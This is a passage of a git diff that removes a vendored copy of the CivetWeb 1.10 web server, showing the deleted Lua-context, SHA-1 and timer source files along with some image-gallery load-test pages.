-		if (ws->conn[i] == conn) {
-			ws->references--;
-			ws->conn[i] = ws->conn[ws->references];
-		}
-	}
-	/* TODO: Delete lua_websock_data and remove it from the websocket list.
-	   This must only be done, when all connections are closed, and all
-	   asynchronous operations and timers are completed/expired. */
-	(void)shared_websock_list; /* shared_websock_list unused (see open TODO) */
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-}
-#endif
-
-
-static lua_State *
-mg_prepare_lua_context_script(const char *file_name,
-                              struct mg_context *ctx,
-                              char *ebuf,
-                              size_t ebuf_len)
-{
-	struct lua_State *L;
-	int lua_ret;
-	const char *lua_err_txt;
-
-	(void)ctx;
-
-	L = luaL_newstate();
-	if (L == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "Error: %s",
-		            "Cannot create Lua state");
-		return 0;
-	}
-	civetweb_open_lua_libs(L);
-
-	lua_ret = luaL_loadfile(L, file_name);
-	if (lua_ret != LUA_OK) {
-		/* Error when loading the file (e.g. file not found,
-		 * out of memory, ...)
-		 */
-		lua_err_txt = lua_tostring(L, -1);
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "Error loading file %s: %s\n",
-		            file_name,
-		            lua_err_txt);
-		return 0;
-	}
-
-	/* The script file is loaded, now call it */
-	lua_ret = lua_pcall(L,
-	                    /* no arguments */ 0,
-	                    /* zero or one return value */ 1,
-	                    /* errors as strint return value */ 0);
-
-	if (lua_ret != LUA_OK) {
-		/* Error when executing the script */
-		lua_err_txt = lua_tostring(L, -1);
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "Error running file %s: %s\n",
-		            file_name,
-		            lua_err_txt);
-		return 0;
-	}
-	/*	lua_close(L); must be done somewhere else */
-
-	return L;
-}
-
-
-int
-run_lua(const char *file_name)
-{
-	int func_ret = EXIT_FAILURE;
-	char ebuf[512] = {0};
-	lua_State *L =
-	    mg_prepare_lua_context_script(file_name, NULL, ebuf, sizeof(ebuf));
-	if (L) {
-		/* Script executed */
-		if (lua_type(L, -1) == LUA_TNUMBER) {
-			func_ret = (int)lua_tonumber(L, -1);
-		} else {
-			func_ret = EXIT_SUCCESS;
-		}
-		lua_close(L);
-	} else {
-		fprintf(stderr, "%s\n", ebuf);
-	}
-	return func_ret;
-}
-
-
-static void *lib_handle_uuid = NULL;
-
-static void
-lua_init_optional_libraries(void)
-{
-#if !defined(_WIN32)
-	lib_handle_uuid = dlopen("libuuid.so", RTLD_LAZY);
-	pf_uuid_generate.p =
-	    (lib_handle_uuid ? dlsym(lib_handle_uuid, "uuid_generate") : 0);
-#else
-	pf_uuid_generate.p = 0;
-#endif
-}
-
-
-static void
-lua_exit_optional_libraries(void)
-{
-#if !defined(_WIN32)
-	if (lib_handle_uuid) {
-		dlclose(lib_handle_uuid);
-	}
-#endif
-	pf_uuid_generate.p = 0;
-	lib_handle_uuid = NULL;
-}
-
-
-/* End of mod_lua.inl */
diff --git a/thirdparty/civetweb-1.10/src/sha1.inl b/thirdparty/civetweb-1.10/src/sha1.inl
deleted file mode 100644
index e491a06..0000000
--- a/thirdparty/civetweb-1.10/src/sha1.inl
+++ /dev/null
@@ -1,322 +0,0 @@
-/*
-SHA-1 in C
-By Steve Reid <sreid@sea-to-sky.net>
-100% Public Domain
-
------------------
-Modified 7/98
-By James H. Brown <jbrown@burgoyne.com>
-Still 100% Public Domain
-
-Corrected a problem which generated improper hash values on 16 bit machines
-Routine SHA1Update changed from
-    void SHA1Update(SHA_CTX* context, unsigned char* data, unsigned int
-len)
-to
-    void SHA1Update(SHA_CTX* context, unsigned char* data, unsigned
-long len)
-
-The 'len' parameter was declared an int which works fine on 32 bit machines.
-However, on 16 bit machines an int is too small for the shifts being done
-against
-it.  This caused the hash function to generate incorrect values if len was
-greater than 8191 (8K - 1) due to the 'len << 3' on line 3 of SHA1Update().
-
-Since the file IO in main() reads 16K at a time, any file 8K or larger would
-be guaranteed to generate the wrong hash (e.g. Test Vector #3, a million
-"a"s).
-
-I also changed the declaration of variables i & j in SHA1Update to
-unsigned long from unsigned int for the same reason.
-
-These changes should make no difference to any 32 bit implementations since
-an
-int and a long are the same size in those environments.
-
---
-I also corrected a few compiler warnings generated by Borland C.
-1. Added #include <process.h> for exit() prototype
-2. Removed unused variable 'j' in SHA1Final
-3. Changed exit(0) to return(0) at end of main.
-
-ALL changes I made can be located by searching for comments containing 'JHB'
------------------
-Modified 8/98
-By Steve Reid <sreid@sea-to-sky.net>
-Still 100% public domain
-
-1- Removed #include <process.h> and used return() instead of exit()
-2- Fixed overwriting of finalcount in SHA1Final() (discovered by Chris Hall)
-3- Changed email address from steve@edmweb.com to sreid@sea-to-sky.net
-
------------------
-Modified 4/01
-By Saul Kravitz <Saul.Kravitz@celera.com>
-Still 100% PD
-Modified to run on Compaq Alpha hardware.
-
------------------
-Modified 07/2002
-By Ralph Giles <giles@ghostscript.com>
-Still 100% public domain
-modified for use with stdint types, autoconf
-code cleanup, removed attribution comments
-switched SHA1Final() argument order for consistency
-use SHA1_ prefix for public api
-move public api to sha1.h
-*/
-
-/*
-11/2016 adapted for CivetWeb:
-  include sha1.h in sha1.c,
-  rename to sha1.inl
-  remove unused #ifdef sections
-  make endian independent
-  align buffer to 4 bytes
-  remove unused variable assignments
-*/
-
-/*
-Test Vectors (from FIPS PUB 180-1)
-"abc"
-  A9993E36 4706816A BA3E2571 7850C26C 9CD0D89D
-"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq"
-  84983E44 1C3BD26E BAAE4AA1 F95129E5 E54670F1
-A million repetitions of "a"
-  34AA973C D4C4DAA4 F61EEB2B DBAD2731 6534016F
-*/
-
-#include <string.h>
-#include <stdint.h>
-
-typedef struct {
-	uint32_t state[5];
-	uint32_t count[2];
-	uint8_t buffer[64];
-} SHA_CTX;
-
-#define SHA1_DIGEST_SIZE 20
-
-#define rol(value, bits) (((value) << (bits)) | ((value) >> (32 - (bits))))
-
-/* blk0() and blk() perform the initial expand. */
-/* I got the idea of expanding during the round function from SSLeay */
-
-
-typedef union {
-	uint8_t c[64];
-	uint32_t l[16];
-} CHAR64LONG16;
-
-
-static uint32_t
-blk0(CHAR64LONG16 *block, int i)
-{
-	static const uint32_t n = 1u;
-	if ((*((uint8_t *)(&n))) == 1) {
-		/* little endian / intel byte order */
-		block->l[i] = (rol(block->l[i], 24) & 0xFF00FF00)
-		              | (rol(block->l[i], 8) & 0x00FF00FF);
-	}
-	return block->l[i];
-}
-
-#define blk(block, i)                                                          \
-	(block->l[i & 15] = rol(block->l[(i + 13) & 15] ^ block->l[(i + 8) & 15]   \
-	                            ^ block->l[(i + 2) & 15] ^ block->l[i & 15],   \
-	                        1))
-
-/* (R0+R1), R2, R3, R4 are the different operations used in SHA1 */
-#define R0(v, w, x, y, z, i)                                                   \
-	z += ((w & (x ^ y)) ^ y) + blk0(block, i) + 0x5A827999 + rol(v, 5);        \
-	w = rol(w, 30);
-#define R1(v, w, x, y, z, i)                                                   \
-	z += ((w & (x ^ y)) ^ y) + blk(block, i) + 0x5A827999 + rol(v, 5);         \
-	w = rol(w, 30);
-#define R2(v, w, x, y, z, i)                                                   \
-	z += (w ^ x ^ y) + blk(block, i) + 0x6ED9EBA1 + rol(v, 5);                 \
-	w = rol(w, 30);
-#define R3(v, w, x, y, z, i)                                                   \
-	z += (((w | x) & y) | (w & x)) + blk(block, i) + 0x8F1BBCDC + rol(v, 5);   \
-	w = rol(w, 30);
-#define R4(v, w, x, y, z, i)                                                   \
-	z += (w ^ x ^ y) + blk(block, i) + 0xCA62C1D6 + rol(v, 5);                 \
-	w = rol(w, 30);
-
-
-/* Hash a single 512-bit block. This is the core of the algorithm. */
-static void
-SHA1_Transform(uint32_t state[5], const uint8_t buffer[64])
-{
-	uint32_t a, b, c, d, e;
-
-	/* Must use an aligned, read/write buffer */
-	CHAR64LONG16 block[1];
-	memcpy(block, buffer, sizeof(block));
-
-	/* Copy context->state[] to working vars */
-	a = state[0];
-	b = state[1];
-	c = state[2];
-	d = state[3];
-	e = state[4];
-
-	/* 4 rounds of 20 operations each. Loop unrolled. */
-	R0(a, b, c, d, e, 0);
-	R0(e, a, b, c, d, 1);
-	R0(d, e, a, b, c, 2);
-	R0(c, d, e, a, b, 3);
-	R0(b, c, d, e, a, 4);
-	R0(a, b, c, d, e, 5);
-	R0(e, a, b, c, d, 6);
-	R0(d, e, a, b, c, 7);
-	R0(c, d, e, a, b, 8);
-	R0(b, c, d, e, a, 9);
-	R0(a, b, c, d, e, 10);
-	R0(e, a, b, c, d, 11);
-	R0(d, e, a, b, c, 12);
-	R0(c, d, e, a, b, 13);
-	R0(b, c, d, e, a, 14);
-	R0(a, b, c, d, e, 15);
-	R1(e, a, b, c, d, 16);
-	R1(d, e, a, b, c, 17);
-	R1(c, d, e, a, b, 18);
-	R1(b, c, d, e, a, 19);
-	R2(a, b, c, d, e, 20);
-	R2(e, a, b, c, d, 21);
-	R2(d, e, a, b, c, 22);
-	R2(c, d, e, a, b, 23);
-	R2(b, c, d, e, a, 24);
-	R2(a, b, c, d, e, 25);
-	R2(e, a, b, c, d, 26);
-	R2(d, e, a, b, c, 27);
-	R2(c, d, e, a, b, 28);
-	R2(b, c, d, e, a, 29);
-	R2(a, b, c, d, e, 30);
-	R2(e, a, b, c, d, 31);
-	R2(d, e, a, b, c, 32);
-	R2(c, d, e, a, b, 33);
-	R2(b, c, d, e, a, 34);
-	R2(a, b, c, d, e, 35);
-	R2(e, a, b, c, d, 36);
-	R2(d, e, a, b, c, 37);
-	R2(c, d, e, a, b, 38);
-	R2(b, c, d, e, a, 39);
-	R3(a, b, c, d, e, 40);
-	R3(e, a, b, c, d, 41);
-	R3(d, e, a, b, c, 42);
-	R3(c, d, e, a, b, 43);
-	R3(b, c, d, e, a, 44);
-	R3(a, b, c, d, e, 45);
-	R3(e, a, b, c, d, 46);
-	R3(d, e, a, b, c, 47);
-	R3(c, d, e, a, b, 48);
-	R3(b, c, d, e, a, 49);
-	R3(a, b, c, d, e, 50);
-	R3(e, a, b, c, d, 51);
-	R3(d, e, a, b, c, 52);
-	R3(c, d, e, a, b, 53);
-	R3(b, c, d, e, a, 54);
-	R3(a, b, c, d, e, 55);
-	R3(e, a, b, c, d, 56);
-	R3(d, e, a, b, c, 57);
-	R3(c, d, e, a, b, 58);
-	R3(b, c, d, e, a, 59);
-	R4(a, b, c, d, e, 60);
-	R4(e, a, b, c, d, 61);
-	R4(d, e, a, b, c, 62);
-	R4(c, d, e, a, b, 63);
-	R4(b, c, d, e, a, 64);
-	R4(a, b, c, d, e, 65);
-	R4(e, a, b, c, d, 66);
-	R4(d, e, a, b, c, 67);
-	R4(c, d, e, a, b, 68);
-	R4(b, c, d, e, a, 69);
-	R4(a, b, c, d, e, 70);
-	R4(e, a, b, c, d, 71);
-	R4(d, e, a, b, c, 72);
-	R4(c, d, e, a, b, 73);
-	R4(b, c, d, e, a, 74);
-	R4(a, b, c, d, e, 75);
-	R4(e, a, b, c, d, 76);
-	R4(d, e, a, b, c, 77);
-	R4(c, d, e, a, b, 78);
-	R4(b, c, d, e, a, 79);
-
-	/* Add the working vars back into context.state[] */
-	state[0] += a;
-	state[1] += b;
-	state[2] += c;
-	state[3] += d;
-	state[4] += e;
-}
-
-
-/* SHA1Init - Initialize new context */
-SHA_API void
-SHA1_Init(SHA_CTX *context)
-{
-	/* SHA1 initialization constants */
-	context->state[0] = 0x67452301;
-	context->state[1] = 0xEFCDAB89;
-	context->state[2] = 0x98BADCFE;
-	context->state[3] = 0x10325476;
-	context->state[4] = 0xC3D2E1F0;
-	context->count[0] = context->count[1] = 0;
-}
-
-
-SHA_API void
-SHA1_Update(SHA_CTX *context, const uint8_t *data, const uint32_t len)
-{
-	uint32_t i, j;
-
-	j = context->count[0];
-	if ((context->count[0] += (len << 3)) < j) {
-		context->count[1]++;
-	}
-	context->count[1] += (len >> 29);
-	j = (j >> 3) & 63;
-	if ((j + len) > 63) {
-		i = 64 - j;
-		memcpy(&context->buffer[j], data, i);
-		SHA1_Transform(context->state, context->buffer);
-		for (; i + 63 < len; i += 64) {
-			SHA1_Transform(context->state, &data[i]);
-		}
-		j = 0;
-	} else {
-		i = 0;
-	}
-	memcpy(&context->buffer[j], &data[i], len - i);
-}
-
-
-/* Add padding and return the message digest. */
-SHA_API void
-SHA1_Final(unsigned char *digest, SHA_CTX *context)
-{
-	uint32_t i;
-	uint8_t finalcount[8];
-
-	for (i = 0; i < 8; i++) {
-		finalcount[i] =
-		    (uint8_t)((context->count[(i >= 4 ? 0 : 1)] >> ((3 - (i & 3)) * 8))
-		              & 255); /* Endian independent */
-	}
-	SHA1_Update(context, (uint8_t *)"\x80", 1);
-	while ((context->count[0] & 504) != 448) {
-		SHA1_Update(context, (uint8_t *)"\x00", 1);
-	}
-	SHA1_Update(context, finalcount, 8); /* Should cause a SHA1_Transform() */
-	for (i = 0; i < SHA1_DIGEST_SIZE; i++) {
-		digest[i] =
-		    (uint8_t)((context->state[i >> 2] >> ((3 - (i & 3)) * 8)) & 255);
-	}
-
-	/* Wipe variables */
-	memset(context, '\0', sizeof(*context));
-}
-
-
-/* End of sha1.inl */
diff --git a/thirdparty/civetweb-1.10/src/timer.inl b/thirdparty/civetweb-1.10/src/timer.inl
deleted file mode 100644
index deca4ac..0000000
--- a/thirdparty/civetweb-1.10/src/timer.inl
+++ /dev/null
@@ -1,227 +0,0 @@
-/* This file is part of the CivetWeb web server.
- * See https://github.com/civetweb/civetweb/
- * (C) 2014-2017 by the CivetWeb authors, MIT license.
- */
-
-#if !defined(MAX_TIMERS)
-#define MAX_TIMERS MAX_WORKER_THREADS
-#endif
-
-typedef int (*taction)(void *arg);
-
-struct ttimer {
-	double time;
-	double period;
-	taction action;
-	void *arg;
-};
-
-struct ttimers {
-	pthread_t threadid;               /* Timer thread ID */
-	pthread_mutex_t mutex;            /* Protects timer lists */
-	struct ttimer timers[MAX_TIMERS]; /* List of timers */
-	unsigned timer_count;             /* Current size of timer list */
-};
-
-
-TIMER_API double
-timer_getcurrenttime(void)
-{
-#if defined(_WIN32)
-	/* GetTickCount returns milliseconds since system start as
-	 * unsigned 32 bit value. It will wrap around every 49.7 days.
-	 * We need to use a 64 bit counter (will wrap in 500 mio. years),
-	 * by adding the 32 bit difference since the last call to a
-	 * 64 bit counter. This algorithm will only work, if this
-	 * function is called at least once every 7 weeks. */
-	static DWORD last_tick;
-	static uint64_t now_tick64;
-
-	DWORD now_tick = GetTickCount();
-
-	now_tick64 += ((DWORD)(now_tick - last_tick));
-	last_tick = now_tick;
-	return (double)now_tick64 * 1.0E-3;
-#else
-	struct timespec now_ts;
-
-	clock_gettime(CLOCK_MONOTONIC, &now_ts);
-	return (double)now_ts.tv_sec + (double)now_ts.tv_nsec * 1.0E-9;
-#endif
-}
-
-
-TIMER_API int
-timer_add(struct mg_context *ctx,
-          double next_time,
-          double period,
-          int is_relative,
-          taction action,
-          void *arg)
-{
-	unsigned u, v;
-	int error = 0;
-	double now;
-
-	if (ctx->stop_flag) {
-		return 0;
-	}
-
-	now = timer_getcurrenttime();
-
-	/* HCP24: if is_relative = 0 and next_time < now
-	 *        action will be called so fast as possible
-	 *        if additional period > 0
-	 *        action will be called so fast as possible
-	 *        n times until (next_time + (n * period)) > now
-	 *        then the period is working
-	 * Solution:
-	 *        if next_time < now then we set next_time = now.
-	 *        The first callback will be so fast as possible (now)
-	 *        but the next callback on period
-	*/
-	if (is_relative) {
-		next_time += now;
-	}
-
-	/* You can not set timers into the past */
-	if (next_time < now) {
-		next_time = now;
-	}
-
-	pthread_mutex_lock(&ctx->timers->mutex);
-	if (ctx->timers->timer_count == MAX_TIMERS) {
-		error = 1;
-	} else {
-		/* Insert new timer into a sorted list. */
-		/* The linear list is still most efficient for short lists (small
-		 * number of timers) - if there are many timers, different
-		 * algorithms will work better. */
-		for (u = 0; u < ctx->timers->timer_count; u++) {
-			if (ctx->timers->timers[u].time > next_time) {
-				/* HCP24: moving all timers > next_time */
-				for (v = ctx->timers->timer_count; v > u; v--) {
-					ctx->timers->timers[v] = ctx->timers->timers[v - 1];
-				}
-				break;
-			}
-		}
-		ctx->timers->timers[u].time = next_time;
-		ctx->timers->timers[u].period = period;
-		ctx->timers->timers[u].action = action;
-		ctx->timers->timers[u].arg = arg;
-		ctx->timers->timer_count++;
-	}
-	pthread_mutex_unlock(&ctx->timers->mutex);
-	return error;
-}
-
-
-static void
-timer_thread_run(void *thread_func_param)
-{
-	struct mg_context *ctx = (struct mg_context *)thread_func_param;
-	double d;
-	unsigned u;
-	int re_schedule;
-	struct ttimer t;
-
-	mg_set_thread_name("timer");
-
-	if (ctx->callbacks.init_thread) {
-		/* Timer thread */
-		ctx->callbacks.init_thread(ctx, 2);
-	}
-
-	d = timer_getcurrenttime();
-
-	while (ctx->stop_flag == 0) {
-		pthread_mutex_lock(&ctx->timers->mutex);
-		if ((ctx->timers->timer_count > 0)
-		    && (d >= ctx->timers->timers[0].time)) {
-			t = ctx->timers->timers[0];
-			for (u = 1; u < ctx->timers->timer_count; u++) {
-				ctx->timers->timers[u - 1] = ctx->timers->timers[u];
-			}
-			ctx->timers->timer_count--;
-			pthread_mutex_unlock(&ctx->timers->mutex);
-			re_schedule = t.action(t.arg);
-			if (re_schedule && (t.period > 0)) {
-				timer_add(ctx, t.time + t.period, t.period, 0, t.action, t.arg);
-			}
-			continue;
-		} else {
-			pthread_mutex_unlock(&ctx->timers->mutex);
-		}
-
-/* 10 ms seems reasonable.
- * A faster loop (smaller sleep value) increases CPU load,
- * a slower loop (higher sleep value) decreases timer accuracy.
- */
-#ifdef _WIN32
-		Sleep(10);
-#else
-		usleep(10000);
-#endif
-
-		d = timer_getcurrenttime();
-	}
-
-	pthread_mutex_lock(&ctx->timers->mutex);
-	ctx->timers->timer_count = 0;
-	pthread_mutex_unlock(&ctx->timers->mutex);
-}
-
-
-#ifdef _WIN32
-static unsigned __stdcall timer_thread(void *thread_func_param)
-{
-	timer_thread_run(thread_func_param);
-	return 0;
-}
-#else
-static void *
-timer_thread(void *thread_func_param)
-{
-	timer_thread_run(thread_func_param);
-	return NULL;
-}
-#endif /* _WIN32 */
-
-
-TIMER_API int
-timers_init(struct mg_context *ctx)
-{
-	ctx->timers =
-	    (struct ttimers *)mg_calloc_ctx(sizeof(struct ttimers), 1, ctx);
-	(void)pthread_mutex_init(&ctx->timers->mutex, NULL);
-
-	(void)timer_getcurrenttime();
-
-	/* Start timer thread */
-	mg_start_thread_with_id(timer_thread, ctx, &ctx->timers->threadid);
-
-	return 0;
-}
-
-
-TIMER_API void
-timers_exit(struct mg_context *ctx)
-{
-	if (ctx->timers) {
-		pthread_mutex_lock(&ctx->timers->mutex);
-		ctx->timers->timer_count = 0;
-
-		mg_join_thread(ctx->timers->threadid);
-
-		/* TODO: Do we really need to unlock the mutex, before
-		 * destroying it, if it's destroyed by the thread currently
-		 * owning the mutex? */
-		pthread_mutex_unlock(&ctx->timers->mutex);
-		(void)pthread_mutex_destroy(&ctx->timers->mutex);
-		mg_free(ctx->timers);
-	}
-}
-
-
-/* End of timer.inl */
diff --git a/thirdparty/civetweb-1.10/test/.leading.dot.txt b/thirdparty/civetweb-1.10/test/.leading.dot.txt
deleted file mode 100644
index 0e4b0c7..0000000
--- a/thirdparty/civetweb-1.10/test/.leading.dot.txt
+++ /dev/null
@@ -1 +0,0 @@
-abc123
diff --git a/thirdparty/civetweb-1.10/test/1000images.lua b/thirdparty/civetweb-1.10/test/1000images.lua
deleted file mode 100644
index 8601a42..0000000
--- a/thirdparty/civetweb-1.10/test/1000images.lua
+++ /dev/null
@@ -1,199 +0,0 @@
-mg.write("HTTP/1.1 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html; charset=utf-8\r\n")

-mg.write("\r\n")

-

-t = os.time()

-

-if not mg.request_info.query_string then

-  cnt = 1000

-else

-  cnt = tonumber(mg.get_var(mg.request_info.query_string, "cnt"))

-end

-

-cnt = 100*math.floor(cnt/100)

-

-mg.write([[

-<html>
-  <head>
-    <title>]] .. cnt .. [[ images</title>
-    <script type="text/javascript">
-      var startLoad = Date.now();
-      window.onload = function () {
-        var loadTime = (Date.now()-startLoad) + " ms";
-        document.getElementById('timing').innerHTML = loadTime;
-      }
-    </script>
-  </head>
-  <body>
-    <h1>A large gallery of small images:</h1>
-    <p>
-]])
-for s=0,(cnt/100)-1 do
-local ts = (tostring(t) .. tostring(s))
-mg.write([[
-      <h2>page ]]..s..[[</h2>
-      <table>
-        <tr>
-          <td><img src="imagetest/00.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/01.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/02.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/03.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/04.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/05.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/06.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/07.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/08.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/09.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/10.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/11.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/12.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/13.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/14.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/15.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/16.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/17.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/18.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/19.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/20.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/21.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/22.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/23.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/24.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/25.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/26.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/27.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/28.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/29.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/20.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/21.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/22.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/23.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/24.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/25.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/26.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/27.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/28.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/29.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/30.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/31.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/32.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/33.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/34.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/35.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/36.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/37.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/38.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/39.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/40.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/41.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/42.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/43.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/44.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/45.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/46.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/47.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/48.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/49.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/50.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/51.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/52.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/53.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/54.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/55.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/56.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/57.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/58.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/59.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/60.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/61.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/62.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/63.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/64.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/65.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/66.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/67.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/68.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/69.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/70.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/71.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/72.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/73.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/74.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/75.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/76.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/77.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/78.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/79.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/80.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/81.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/82.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/83.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/84.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/85.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/86.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/87.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/88.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/89.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/90.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/91.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/92.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/93.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/94.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/95.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/96.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/97.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/98.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/99.png?ts=]]..ts..[["></td>
-        </tr>
-      </table>
-]])
-end
-mg.write([[
-    </p>
-    <p id="timing">
-      Test case: all images are displayed.
-    </p>
-  </body>
-</html>
-]])
diff --git a/thirdparty/civetweb-1.10/test/100images.htm b/thirdparty/civetweb-1.10/test/100images.htm
deleted file mode 100644
index 9e433f6..0000000
--- a/thirdparty/civetweb-1.10/test/100images.htm
+++ /dev/null
@@ -1,160 +0,0 @@
-<html>
-
-  <!-- Test case description:                              -->
-  <!-- This test contains 100 small images in a table.     -->
-  <!-- Once a browser opens the html file, it will request -->
-  <!-- all these images from the server very quickly.      -->
-  <!-- Depending on the "keep-alive" settings, it will     -->
-  <!-- either open/close 100 connections quite rapidly     -->
-  <!-- if keep-alive=no, or otherwise establish only a few -->
-  <!-- connections, typically one or two, and reuse them.  -->
-  <!-- If the test succeeds, all 100 images are displayed. -->
-  <!-- The loading time is measured automatically in the   -->
-  <!-- browser using JavaScript. Note that the load times  -->
-  <!-- also differs between HTTP and HTTPS.                -->
-
-  <head>
-    <title>100 images</title>
-    <script type="text/javascript">
-      var startLoad = Date.now();
-      window.onload = function () {
-        var loadTime = (Date.now()-startLoad) + " ms";
-        document.getElementById('timing').innerHTML = loadTime;
-      }
-    </script>
-  </head>
-  <body>
-    <h1>A gallery of small images:</h1>
-    <p>
-      <table>
-        <tr>
-          <td><img src="imagetest/00.png"></td>
-          <td><img src="imagetest/01.png"></td>
-          <td><img src="imagetest/02.png"></td>
-          <td><img src="imagetest/03.png"></td>
